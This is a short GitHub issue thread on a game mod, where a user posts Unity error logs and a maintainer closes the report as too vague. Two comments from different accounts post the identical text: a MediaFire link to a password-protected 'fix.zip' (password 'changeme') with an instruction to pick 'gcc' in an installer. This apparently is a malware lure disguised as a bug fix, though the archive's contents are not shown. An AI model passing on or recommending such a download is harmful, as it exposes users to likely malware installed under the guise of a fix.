### ISSUE TITLE
getting the following error message

### ISSUE THREAD

**Issue by Philemon5** [ka-dyn/ExpandedContent#161]
The referenced script on this Behaviour (Game Object '<null>') is missing!
The referenced script on this Behaviour (Game Object '<null>') is missing!
Parent of RectTransform is being set with parent property. Consider using the SetParent method instead, with the worldPositionStays argument set to false. This will retain local orientation and scale rather than world orientation and scale, which can prevent common UI scaling issues.
Curl error 6: Could not resolve host: siren.owlcat.local
The referenced script on this Behaviour (Game Object '<null>') is missing!

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bittercranberry** [comment]
I'm going to close this as it is so vague, please follow the template for bug reports
